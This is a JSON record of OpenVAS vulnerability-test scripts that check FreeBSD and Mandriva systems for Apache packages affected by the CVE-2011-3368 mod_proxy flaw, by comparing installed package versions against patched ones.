{"openvas": [{"lastseen": "2017-07-02T21:10:52", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2017-04-18T00:00:00", "id": "OPENVAS:70600", "href": "http://plugins.openvas.org/nasl.php?oid=70600", "sourceData": "#\n#VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://httpd.apache.org/security/vulnerabilities_13.html\nhttp://seclists.org/fulldisclosure/2011/Oct/232\nhttp://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70600);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 11:02:14 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 5963 $\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, 
b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:54", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231070600", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070600", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apache19.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70600\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", 
value:\"http://httpd.apache.org/security/vulnerabilities_13.html\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Oct/232\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = 
portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2011:144 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831460", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831460", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831460\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2009\\.0)\");\n script_tag(name:\"affected\", value:\"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x 
through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n 
if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == 
\"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
